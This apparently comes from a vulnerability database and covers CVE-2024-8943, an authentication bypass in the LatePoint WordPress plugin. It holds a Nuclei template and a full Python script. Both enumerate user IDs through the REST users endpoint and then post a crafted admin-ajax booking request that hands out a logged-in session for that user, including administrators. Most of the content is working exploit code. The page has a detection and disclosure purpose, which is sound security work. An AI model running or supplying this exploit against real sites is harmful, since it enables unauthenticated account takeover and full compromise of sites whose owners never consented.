LatePoint <= 5.0.12 - Authentication Bypass
CVE-2024-8943
Verified
Description
LatePoint plugin for WordPress, in versions up to and including 5.0.12, contains an authentication bypass caused by insufficient verification of the user during the booking flow. An unauthenticated attacker who knows the WordPress user ID of an existing account (IDs are commonly enumerable through the /wp/v2/users REST endpoint, which is how the template below obtains one) can obtain a logged-in session as that user, including administrators. Exploitation requires the plugin's 'Use WordPress users as customers' setting to be enabled.
Severity
Critical
CVSS Score
9.8
Exploit Probability (EPSS)
40%
Affected Product
latepoint
Published Date
February 4, 2026
Template Author
daffainfo
CVE-2024-8943.yaml
id: CVE-2024-8943
info:
name: LatePoint <= 5.0.12 - Authentication Bypass
author: daffainfo
severity: critical
description: |
LatePoint plugin for WordPress versions up to 5.0.12 contains an authentication bypass caused by insufficient verification of user during booking, letting unauthenticated attackers log in as any existing user if they have user ID access, exploit requires access to user ID, and the 'Use WordPress users as customers' setting enabled.
impact: |
Attackers can log in as any existing user, including administrators, potentially leading to full site compromise.
remediation: |
Update to version 5.0.13 or later.
reference:
- https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/LatePoint/latepoint-5012-authentication-bypass
- https://www.wordfence.com/blog/2024/10/7000-wordpress-sites-affected-by-unauthenticated-critical-vulnerabilities-in-latepoint-wordpress-plugin/
- https://nvd.nist.gov/vuln/detail/CVE-2024-8943
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2024-8943
epss-score: 0.40056
epss-percentile: 0.97393
cwe-id: CWE-287
cpe: cpe:2.3:a:latepoint:latepoint:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 3
vendor: latepoint
product: latepoint
framework: wordpress
tags: cve,cve2024,wp,wordpress,wp-plugin,latepoint,auth-bypass,vkev
variables:
password: "{{rand_base(8)}}"
email: "{{randstr}}@{{rand_base(5)}}.com"
firstname: "{{rand_base(5)}}"
lastname: "{{rand_base(5)}}"
flow: http(1) && http(2)
http:
- method: GET
path:
- "{{BaseURL}}/{{route}}"
attack: clusterbomb
payloads:
route:
- "wp-json/wp/v2/users"
- "?rest_route=/wp/v2/users"
stop-at-first-match: true
matchers:
- type: dsl
dsl:
- 'contains_all(body, "[{\"id", "name\":")'
- 'contains(content_type, "application/json")'
- 'status_code == 200'
condition: and
internal: true
extractors:
- type: json
name: userid
json:
- '.[0].id'
internal: true
- type: json
name: username
json:
- '.[0].name'
internal: true
- raw:
- |
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
action=latepoint_route_call&route_name=steps__load_step&params=current_step_code%3dcustomer%26step_direction%3dnext%26customer%5bid%5d%3d{{userid}}%26customer%5bemail%5d%3d{{email}}%26customer%5bpassword%5d%3d{{password}}%26customer%5bpassword_confirmation%5d%3d{{password}}%26customer%5bfirst_name%5d%3d{{firstname}}%26customer%5blast_name%5d%3d{{lastname}}&layout=none&return_format=json
matchers:
- type: dsl
dsl:
- 'contains(set_cookie, "wordpress_logged_in_")'
- 'contains(body, "\"status\":\"success\"")'
- 'status_code == 200'
condition: and
# digest: 4a0a004730450220528f93eae4798aecd2a81a576b6d596bb236c13eb6af2a157c4421718ff9b3d4022100d3665573419f889e5e86e2580536bd21834cd6d98ff95899264bb33cc4bfe3b9:922c64590222798bb761d5b6d8e72950
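The template above chains two requests: a user-ID pick from the REST users listing, then the LatePoint booking step with customer[id] set to that ID, looking for a wordpress_logged_in_ cookie in the reply. The following Python script is an added example that reconstructs that flow outside Nuclei; it is not the template's, Wordfence's, or the vendor's code. The email, password and name values are constructed placeholders (the template uses random values), and the function names are this example's own.

```python
"""Reconstruction of the two-step check in CVE-2024-8943.yaml (added example).

Step 1 picks a user ID from the WordPress REST API; step 2 posts the LatePoint
booking step with customer[id] set to that ID and checks for a login cookie.
"""
import json
import sys
import urllib.error
import urllib.request
from urllib.parse import parse_qs, urlencode

PROBE_EMAIL = "probe@example.invalid"   # constructed placeholder, not from the template
PROBE_PASSWORD = "Pr0be-Only-Pw"        # constructed placeholder, not from the template
USER_ROUTES = ("wp-json/wp/v2/users", "?rest_route=/wp/v2/users")


def first_user(rest_body: str):
    """Return (id, name) of the first entry of a /wp/v2/users listing, or None.

    Same selection as the template's '.[0].id' / '.[0].name' extractors; an error
    object or an empty list means there is no enumerable user here.
    """
    try:
        users = json.loads(rest_body)
    except ValueError:
        return None
    if not isinstance(users, list) or not users or not isinstance(users[0], dict):
        return None
    if "id" not in users[0]:
        return None
    return users[0]["id"], users[0].get("name")


def booking_step_body(user_id, email=PROBE_EMAIL, password=PROBE_PASSWORD,
                      first_name="probe", last_name="probe") -> str:
    """Build the admin-ajax.php form body the way the template does.

    'params' is one form field whose value is itself a query string, so its
    '&', '=', '[' and ']' are percent-encoded once by the outer form encoding
    (the %26 / %3d / %5b visible in the template's raw request).
    """
    fields = {
        "current_step_code": "customer",
        "step_direction": "next",
        "customer[id]": str(user_id),      # victim's WordPress user ID
        "customer[email]": email,
        "customer[password]": password,
        "customer[password_confirmation]": password,
        "customer[first_name]": first_name,
        "customer[last_name]": last_name,
    }
    inner = "&".join(f"{k}={v}" for k, v in fields.items())
    return urlencode({
        "action": "latepoint_route_call",
        "route_name": "steps__load_step",
        "params": inner,
        "layout": "none",
        "return_format": "json",
    })


def decode_booking_step_body(body: str) -> dict:
    """Undo both encoding layers (handy when reading a captured request)."""
    outer = {k: v[0] for k, v in parse_qs(body).items()}
    inner = {k: v[0] for k, v in parse_qs(outer.get("params", "")).items()}
    return {"outer": outer, "inner": inner}


def logged_in(status: int, set_cookie_headers, body: str) -> bool:
    """The template's final matchers: HTTP 200, a wordpress_logged_in_ cookie, JSON status success."""
    if status != 200:
        return False
    if not any("wordpress_logged_in_" in c for c in set_cookie_headers):
        return False
    try:
        return json.loads(body).get("status") == "success"
    except (ValueError, AttributeError):
        return False


def probe(base_url: str):
    """Run both steps against a live site. Returns (id, name) of the user a session was issued for, else None."""
    base = base_url.rstrip("/")
    user = None
    for route in USER_ROUTES:
        try:
            with urllib.request.urlopen(f"{base}/{route}", timeout=15) as r:
                user = first_user(r.read().decode("utf-8", "replace"))
        except OSError:                   # URLError and timeouts both derive from OSError
            continue
        if user:
            break
    if not user:
        return None                       # no enumerable user; the ID must come from elsewhere
    req = urllib.request.Request(
        f"{base}/wp-admin/admin-ajax.php",
        data=booking_step_body(user[0]).encode(),
        headers={"Content-Type": "application/x-www-form-urlencoded"},
        method="POST",
    )
    try:
        with urllib.request.urlopen(req, timeout=15) as r:
            status, cookies, body = r.status, r.headers.get_all("Set-Cookie") or [], r.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as e:
        status, cookies, body = e.code, e.headers.get_all("Set-Cookie") or [], e.read().decode("utf-8", "replace")
    return user if logged_in(status, cookies, body) else None


if __name__ == "__main__":
    hit = probe(sys.argv[1])
    print(f"VULNERABLE: session issued as user id={hit[0]} name={hit[1]!r}" if hit
          else "no login cookie issued (patched, setting disabled, or no enumerable user)")
```

Invoke it as `python3 probe.py https://target.example`. A positive result means the target handed out a real session for that user, so run it only against sites you are authorized to test. A negative result is not proof of a patched plugin: the bypass only triggers when 'Use WordPress users as customers' is on, and the first step silently fails when the REST users listing is restricted, so confirm the installed version (5.0.13 or later) rather than relying on the probe alone. The cookie check matches the template; the success check parses the JSON instead of looking for the exact substring `"status":"success"`, which also tolerates pretty-printed responses.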
CVSS Metrics
CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CVE ID:
CVE-2024-8943
CWE ID:
CWE-287
References
https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/LatePoint/latepoint-5012-authentication-bypass
https://www.wordfence.com/blog/2024/10/7000-wordpress-sites-affected-by-unauthenticated-critical-vulnerabilities-in-latepoint-wordpress-plugin/
https://nvd.nist.gov/vuln/detail/CVE-2024-8943
Remediation Steps
Update to version 5.0.13 or later.